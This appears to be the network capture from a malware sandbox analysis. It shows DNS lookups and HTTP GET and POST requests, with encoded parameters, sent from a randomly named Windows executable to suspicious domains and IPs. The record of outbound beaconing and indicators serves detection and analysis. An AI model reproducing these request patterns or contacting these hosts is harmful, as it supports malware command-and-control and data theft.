                                                            Jan 11, 2025 05:39:04.474013090 CET53535741.1.1.1192.168.2.6
                                                            Jan 11, 2025 05:39:04.476665974 CET5357453192.168.2.61.1.1.1
                                                            Jan 11, 2025 05:39:04.481601000 CET53535741.1.1.1192.168.2.6
                                                            Jan 11, 2025 05:39:04.946882963 CET5357453192.168.2.61.1.1.1
                                                            Jan 11, 2025 05:39:04.951885939 CET53535741.1.1.1192.168.2.6
                                                            Jan 11, 2025 05:39:04.951968908 CET5357453192.168.2.61.1.1.1
                                                            Jan 11, 2025 05:39:47.867605925 CET5376580192.168.2.6162.218.30.235
                                                            Jan 11, 2025 05:39:47.872603893 CET8053765162.218.30.235192.168.2.6
                                                            Jan 11, 2025 05:39:47.872740030 CET5376580192.168.2.6162.218.30.235
                                                            Jan 11, 2025 05:39:47.882653952 CET5376580192.168.2.6162.218.30.235
                                                            Jan 11, 2025 05:39:47.887568951 CET8053765162.218.30.235192.168.2.6
                                                            Jan 11, 2025 05:39:48.471570015 CET8053765162.218.30.235192.168.2.6
                                                            Jan 11, 2025 05:39:48.471611023 CET8053765162.218.30.235192.168.2.6
                                                            Jan 11, 2025 05:39:48.471913099 CET5376580192.168.2.6162.218.30.235
                                                            Jan 11, 2025 05:39:48.475152016 CET5376580192.168.2.6162.218.30.235
                                                            Jan 11, 2025 05:39:48.479991913 CET8053765162.218.30.235192.168.2.6
                                                            Jan 11, 2025 05:40:12.506225109 CET5376780192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:12.511085033 CET805376713.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:12.511208057 CET5376780192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:12.531280041 CET5376780192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:12.536272049 CET805376713.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:13.477724075 CET805376713.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:13.477746010 CET805376713.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:13.477792978 CET805376713.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:13.477807045 CET805376713.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:13.477921963 CET5376780192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:13.478049040 CET5376780192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:13.478127003 CET805376713.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:13.478281975 CET805376713.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:13.478296041 CET805376713.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:13.478363991 CET5376780192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:13.478449106 CET805376713.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:13.478460073 CET805376713.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:13.478527069 CET5376780192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:13.478611946 CET805376713.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:13.478677034 CET5376780192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:14.039382935 CET5376780192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:15.057683945 CET5376880192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:15.062650919 CET805376813.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:15.062851906 CET5376880192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:15.077296972 CET5376880192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:15.082197905 CET805376813.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:16.043466091 CET805376813.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:16.043493032 CET805376813.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:16.043504953 CET805376813.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:16.043515921 CET805376813.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:16.043523073 CET805376813.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:16.043531895 CET805376813.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:16.043544054 CET805376813.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:16.043617964 CET5376880192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:16.043617964 CET5376880192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:16.043694973 CET805376813.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:16.043708086 CET805376813.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:16.043720007 CET805376813.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:16.043750048 CET5376880192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:16.043777943 CET5376880192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:16.043884993 CET805376813.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:16.043939114 CET5376880192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:16.586111069 CET5376880192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:17.606651068 CET5376980192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:17.611475945 CET805376913.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:17.611567974 CET5376980192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:17.632543087 CET5376980192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:17.637367010 CET805376913.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:17.637535095 CET805376913.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:18.583956957 CET805376913.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:18.584067106 CET805376913.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:18.584076881 CET805376913.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:18.584119081 CET5376980192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:18.584254026 CET805376913.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:18.584264040 CET805376913.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:18.584295034 CET5376980192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:18.584350109 CET805376913.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:18.584384918 CET5376980192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:18.584434986 CET805376913.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:18.584446907 CET805376913.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:18.584479094 CET5376980192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:18.584536076 CET805376913.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:18.584572077 CET5376980192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:19.148540974 CET5376980192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:20.170039892 CET5377080192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:20.174942970 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:20.175112009 CET5377080192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:20.186403036 CET5377080192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:20.191246986 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.142358065 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.142373085 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.142400980 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.142509937 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.142522097 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.142541885 CET5377080192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:21.142597914 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.142606974 CET5377080192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:21.142643929 CET5377080192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:21.142707109 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.142770052 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.142781019 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.142791986 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.142808914 CET5377080192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:21.142829895 CET5377080192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:21.147396088 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.147434950 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.147478104 CET5377080192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:21.392695904 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.392733097 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.392744064 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.392855883 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.392867088 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.392879963 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.392954111 CET5377080192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:21.392999887 CET5377080192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:21.393009901 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.393022060 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.393052101 CET5377080192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:21.393594980 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.393608093 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.393620968 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.393666029 CET5377080192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:21.393728018 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.393747091 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.393764973 CET5377080192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:21.394392967 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.394404888 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.394418001 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:21.394432068 CET5377080192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:21.394459963 CET5377080192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:21.437772036 CET5377080192.168.2.613.228.81.39
                                                            Jan 11, 2025 05:40:21.442673922 CET805377013.228.81.39192.168.2.6
                                                            Jan 11, 2025 05:40:34.556130886 CET5377180192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:34.561044931 CET8053771209.74.79.40192.168.2.6
                                                            Jan 11, 2025 05:40:34.561115980 CET5377180192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:34.576555014 CET5377180192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:34.582231998 CET8053771209.74.79.40192.168.2.6
                                                            Jan 11, 2025 05:40:35.161891937 CET8053771209.74.79.40192.168.2.6
                                                            Jan 11, 2025 05:40:35.162178993 CET8053771209.74.79.40192.168.2.6
                                                            Jan 11, 2025 05:40:35.162237883 CET5377180192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:36.086200953 CET5377180192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:37.104840994 CET5377280192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:37.110614061 CET8053772209.74.79.40192.168.2.6
                                                            Jan 11, 2025 05:40:37.110702038 CET5377280192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:37.130539894 CET5377280192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:37.135334015 CET8053772209.74.79.40192.168.2.6
                                                            Jan 11, 2025 05:40:37.703903913 CET8053772209.74.79.40192.168.2.6
                                                            Jan 11, 2025 05:40:37.703991890 CET8053772209.74.79.40192.168.2.6
                                                            Jan 11, 2025 05:40:37.704071045 CET5377280192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:38.632863998 CET5377280192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:39.651581049 CET5377480192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:39.656531096 CET8053774209.74.79.40192.168.2.6
                                                            Jan 11, 2025 05:40:39.657300949 CET5377480192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:39.671791077 CET5377480192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:39.676717997 CET8053774209.74.79.40192.168.2.6
                                                            Jan 11, 2025 05:40:39.676733017 CET8053774209.74.79.40192.168.2.6
                                                            Jan 11, 2025 05:40:40.244244099 CET8053774209.74.79.40192.168.2.6
                                                            Jan 11, 2025 05:40:40.244265079 CET8053774209.74.79.40192.168.2.6
                                                            Jan 11, 2025 05:40:40.244395018 CET5377480192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:41.179661989 CET5377480192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:42.359538078 CET5377580192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:42.364435911 CET8053775209.74.79.40192.168.2.6
                                                            Jan 11, 2025 05:40:42.364538908 CET5377580192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:42.379537106 CET5377580192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:42.384433985 CET8053775209.74.79.40192.168.2.6
                                                            Jan 11, 2025 05:40:42.944967031 CET8053775209.74.79.40192.168.2.6
                                                            Jan 11, 2025 05:40:42.945218086 CET8053775209.74.79.40192.168.2.6
                                                            Jan 11, 2025 05:40:42.945271015 CET5377580192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:42.948898077 CET5377580192.168.2.6209.74.79.40
                                                            Jan 11, 2025 05:40:42.953769922 CET8053775209.74.79.40192.168.2.6
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jan 11, 2025 05:39:04.467983961 CET53501411.1.1.1192.168.2.6
                                                            Jan 11, 2025 05:39:47.379456997 CET5757053192.168.2.61.1.1.1
                                                            Jan 11, 2025 05:39:47.860606909 CET53575701.1.1.1192.168.2.6
                                                            Jan 11, 2025 05:40:03.515642881 CET6478853192.168.2.61.1.1.1
                                                            Jan 11, 2025 05:40:03.545890093 CET53647881.1.1.1192.168.2.6
                                                            Jan 11, 2025 05:40:11.794701099 CET6457253192.168.2.61.1.1.1
                                                            Jan 11, 2025 05:40:12.503252983 CET53645721.1.1.1192.168.2.6
                                                            Jan 11, 2025 05:40:26.448817015 CET5179753192.168.2.61.1.1.1
                                                            Jan 11, 2025 05:40:26.457721949 CET53517971.1.1.1192.168.2.6
                                                            Jan 11, 2025 05:40:34.542716980 CET5321153192.168.2.61.1.1.1
                                                            Jan 11, 2025 05:40:34.553602934 CET53532111.1.1.1192.168.2.6
                                                            Jan 11, 2025 05:40:49.433115005 CET6312153192.168.2.61.1.1.1
                                                            Jan 11, 2025 05:40:49.444139004 CET53631211.1.1.1192.168.2.6
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Jan 11, 2025 05:39:47.379456997 CET192.168.2.61.1.1.10xcdfStandard query (0)www.l54354.xyzA (IP address)IN (0x0001)false
                                                            Jan 11, 2025 05:40:03.515642881 CET192.168.2.61.1.1.10x4734Standard query (0)www.valdevez.netA (IP address)IN (0x0001)false
                                                            Jan 11, 2025 05:40:11.794701099 CET192.168.2.61.1.1.10xb6abStandard query (0)www.sharefree88k24.clickA (IP address)IN (0x0001)false
                                                            Jan 11, 2025 05:40:26.448817015 CET192.168.2.61.1.1.10x1bb1Standard query (0)www.tizzles.techA (IP address)IN (0x0001)false
                                                            Jan 11, 2025 05:40:34.542716980 CET192.168.2.61.1.1.10xfb8Standard query (0)www.shopphere.storeA (IP address)IN (0x0001)false
                                                            Jan 11, 2025 05:40:49.433115005 CET192.168.2.61.1.1.10x15c7Standard query (0)www.odvfr.infoA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Jan 11, 2025 05:39:47.860606909 CET1.1.1.1192.168.2.60xcdfNo error (0)www.l54354.xyz162.218.30.235A (IP address)IN (0x0001)false
                                                            Jan 11, 2025 05:40:03.545890093 CET1.1.1.1192.168.2.60x4734Name error (3)www.valdevez.netnonenoneA (IP address)IN (0x0001)false
                                                            Jan 11, 2025 05:40:12.503252983 CET1.1.1.1192.168.2.60xb6abNo error (0)www.sharefree88k24.clickdns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                                                            Jan 11, 2025 05:40:12.503252983 CET1.1.1.1192.168.2.60xb6abNo error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
                                                            Jan 11, 2025 05:40:12.503252983 CET1.1.1.1192.168.2.60xb6abNo error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                                                            Jan 11, 2025 05:40:26.457721949 CET1.1.1.1192.168.2.60x1bb1Name error (3)www.tizzles.technonenoneA (IP address)IN (0x0001)false
                                                            Jan 11, 2025 05:40:34.553602934 CET1.1.1.1192.168.2.60xfb8No error (0)www.shopphere.store209.74.79.40A (IP address)IN (0x0001)false
                                                            Jan 11, 2025 05:40:49.444139004 CET1.1.1.1192.168.2.60x15c7No error (0)www.odvfr.info47.254.140.255A (IP address)IN (0x0001)false
                                                            • www.l54354.xyz
                                                            • www.sharefree88k24.click
                                                            • www.shopphere.store
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.653765162.218.30.235803880C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:39:47.882653952 CET461OUTGET /jq20/?pLNPctn=Y1tg4+SOL5eE+AycCXTvziB71yBrg1O91RsaYXN25C6htIJcZWWT4ijvmmdbSmKvee6IP68K4FvBkloeJ7ydTRz05iBunvLV+SpSL2s6yDyPdWIOZH0K/EFLjzJIDWXT1oCQnJs=&yL=ohjXjzZp0vl4 HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Host: www.l54354.xyz
                                                            Connection: close
                                                            User-Agent: HTC_Touch_HD_T8282 Opera/9.50 (Windows NT 5.1; U; it)
                                                            Jan 11, 2025 05:39:48.471570015 CET455INHTTP/1.1 302 Redirect
                                                            Content-Type: text/html; charset=UTF-8
                                                            Location: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=68383/jq20/
                                                            Server: Microsoft-IIS/10.0
                                                            Date: Sat, 11 Jan 2025 04:39:47 GMT
                                                            Connection: close
                                                            Content-Length: 200
                                                            Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e e6 96 87 e6 a1 a3 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e e5 af b9 e8 b1 a1 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 68 31 3e e5 8f af e5 9c a8 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 78 2e 6c 6f 6e 67 77 61 79 73 75 6e 2e 63 6f 6d 2f 61 70 70 2f 72 65 67 69 73 74 65 72 2e 70 68 70 3f 73 69 74 65 5f 69 64 3d 32 32 33 39 26 61 6d 70 3b 74 6f 70 49 64 3d 36 38 33 38 33 2f 6a 71 32 30 2f 22 3e e6 ad a4 e5 a4 84 3c 2f 61 3e e6 89 be e5 88 b0 e8 af a5 e6 96 87 e6 a1 a3 3c 2f 62 6f 64 79 3e
                                                            Data Ascii: <head><title></title></head><body><h1></h1><a HREF="https://wx.longwaysun.com/app/register.php?site_id=2239&amp;topId=68383/jq20/"></a></body>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.65376713.228.81.39803880C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:40:12.531280041 CET740OUTPOST /iz19/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate
                                                            Host: www.sharefree88k24.click
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 212
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.sharefree88k24.click
                                                            Referer: http://www.sharefree88k24.click/iz19/
                                                            User-Agent: HTC_Touch_HD_T8282 Opera/9.50 (Windows NT 5.1; U; it)
                                                            Data Raw: 70 4c 4e 50 63 74 6e 3d 5a 75 45 6c 74 30 59 72 7a 43 43 69 6b 77 4a 42 59 6e 30 61 50 35 77 6b 54 70 36 39 76 67 4e 53 4a 53 59 65 72 7a 6e 53 62 41 6e 2b 4b 73 34 49 6c 4d 73 44 74 72 30 41 54 44 78 66 65 38 57 50 76 6a 69 33 46 30 61 4c 69 6b 42 78 67 72 4f 69 6e 61 37 6f 78 6a 64 50 51 37 6e 33 45 74 67 51 61 32 61 63 2f 78 51 65 38 79 53 69 59 75 52 4c 76 56 31 49 64 58 65 34 34 32 53 68 53 70 54 66 31 53 41 32 51 72 64 70 63 4e 42 78 44 6f 66 6a 47 77 2b 46 45 58 64 79 49 35 63 68 4f 63 38 74 46 46 75 6a 4a 48 71 68 35 62 63 48 6f 57 65 55 74 33 61 55 39 30 4c 47 34 50 56 4f 30 54 52 7a 2f 66 2f 6c 76 39 68 4b 4b 65 43 4a
                                                            Data Ascii: pLNPctn=ZuElt0YrzCCikwJBYn0aP5wkTp69vgNSJSYerznSbAn+Ks4IlMsDtr0ATDxfe8WPvji3F0aLikBxgrOina7oxjdPQ7n3EtgQa2ac/xQe8ySiYuRLvV1IdXe442ShSpTf1SA2QrdpcNBxDofjGw+FEXdyI5chOc8tFFujJHqh5bcHoWeUt3aU90LG4PVO0TRz/f/lv9hKKeCJ
                                                            Jan 11, 2025 05:40:13.477724075 CET1236INHTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Sat, 11 Jan 2025 04:40:13 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
                                                            Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://p
                                                            Data Raw:
                                                            Data Ascii:
                                                            Jan 11, 2025 05:40:13.477746010 CET1236INData Raw: 70 75 70 78 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 2a 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 73 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 67 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f
                                                            Data Ascii: pupx.ladi.me https://*.ladi.me https://s.ladicdn.com https://g.ladicdn.com https://w.ladicdn.com https://*.ladicdn.com https://www.facebook.com https://*.facebook.comSet-Cookie: LADI_DNS_CHECK="2025-01-11 04:40:13.316799496 +0000 UTC m=+1197
                                                            Jan 11, 2025 05:40:13.477792978 CET1236INData Raw: 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 5f 50 41 54 48 3d 3b 20 50 61 74 68 3d 2f 69 7a 31 39 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f
                                                            Data Ascii: t-Cookie: LADI_CAMP_PAGE_VIEW_PATH=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT_PATH=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW=; Path=/iz19; Max-A
                                                            Jan 11, 2025 05:40:13.477807045 CET794INData Raw: 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 3d 3b 20 50 61 74 68 3d 2f 69 7a 31 39 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 5f
                                                            Data Ascii: kie: LADI_CAMP_PAGE_VIEW=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_PAGE_VIEW_PATH=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT_PATH=; Path=/iz19; Max-Age=0Set-Cook
                                                            Jan 11, 2025 05:40:13.478127003 CET1236INData Raw: 31 34 30 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 3c db 8e db 48 76 bf 52 d6 62 a6 25 b8 a8 96 ba 5b 7d 91 5a 3d f1 38 4e 76 80 c1 8e 31 e3 d9 ec c2 70 8c 12 59 92 38 4d 91 34 49 f5 c5 da 7e 08 f2 98 87 60 9f f3 92 c1 60 10 20 40 80 20 c8 d3 fa
                                                            Data Ascii: 140c<HvRb%[}Z=8Nv1pY8M4I~`` @ SU$d-YS^.</~'Tsv#E1Oo_u:;Mg](${1n=e[O?Elx>xi;-u/67E$H
                                                            Jan 11, 2025 05:40:13.478281975 CET1236INData Raw: 1c ee ec 8c d2 47 01 4b 88 7d a5 d8 6a 43 4c c2 c2 98 0f d3 07 25 41 0b f4 c7 16 22 95 44 69 42 3c 0c 41 12 8b d8 12 74 61 91 c5 9c ef 96 b1 84 2e 05 50 53 15 d4 55 28 b9 1a 6b 6f ba 01 68 c9 14 22 27 6b ee 3a 0e f7 57 e9 fb 50 be df 08 47 69 25
                                                            Data Ascii: GK}jCL%A"DiB<Ata.PSU(koh"'k:WPGi%83W%)^|9Vkn~WaO+P"SHmM:{|[KuXM}j;h6aRz;FEP:uHqp-v1NG%61@pEk$F
                                                            Jan 11, 2025 05:40:13.478296041 CET1236INData Raw: 5d 1e 60 fa 46 a8 6c ae 83 f7 89 cb a6 03 d7 d4 3c d8 ae 1b 2c e4 a0 07 8a cb b0 d3 56 0a bb a6 ae 07 3f c0 12 3c 90 6b f7 07 9f 7c a0 b5 35 d0 3a 9c 23 6d 2b 35 a2 b6 fd 7e ff 43 e5 fb 17 1f 63 b4 a1 c7 e2 c4 b2 f1 22 9b 3a 02 b3 d4 5c ff c8 5d
                                                            Data Ascii: ]`Fl<,V?<k|5:#m+5~Cc":\]6'iVSmzo=}Wz>O7#bl}JiGmrPbZsS;C]^Vw\=,pE2Tb&,i<#)7h\Or$j&exXG
                                                            Jan 11, 2025 05:40:13.478449106 CET1236INData Raw: 77 5c 46 da f9 b2 ef e8 10 6f 7d ae 54 b0 b6 f4 3c 51 9c 3b ee 8b cb f2 79 a7 b8 31 6a 0d a0 86 3c 26 83 de 27 9d 82 43 31 64 4a d1 0f 50 33 a6 96 10 cb 31 cb 56 9c 47 87 47 39 66 6a 93 44 71 1c 34 d5 92 b3 79 96 7e c3 ba 4a e7 f7 ac 24 fb 6a d0
                                                            Data Ascii: w\Fo}T<Q;y1j<&'C1dJP31VGG9fjDq4y~J$jx[YKxHK,M1Ys/.sRGe$&9(R(+m!l0{G0Lq@~1nmS;7oS=l%1?JX6B
                                                            Jan 11, 2025 05:40:13.478460073 CET216INData Raw: de 89 e7 2e ba 03 21 41 d9 bf 45 3e fd b4 cc 20 a8 2d 0e 2a 64 99 2c 23 7f 74 93 29 b5 44 fb 19 c2 44 d2 39 70 bc bd 23 21 ec d0 02 42 b8 95 70 87 67 c9 2d 24 fe fc fa 29 b2 f3 57 6c c1 ab ac 84 d5 a3 c7 db 4d a6 81 69 f6 6b 65 d5 d3 65 25 09 30
                                                            Data Ascii: .!AE> -*d,#t)DD9p#!Bpg-$)WlMikee%0+O\RGX%gUoi ]]{{{{^?hw%1}eY*<I4(tWaga0b0


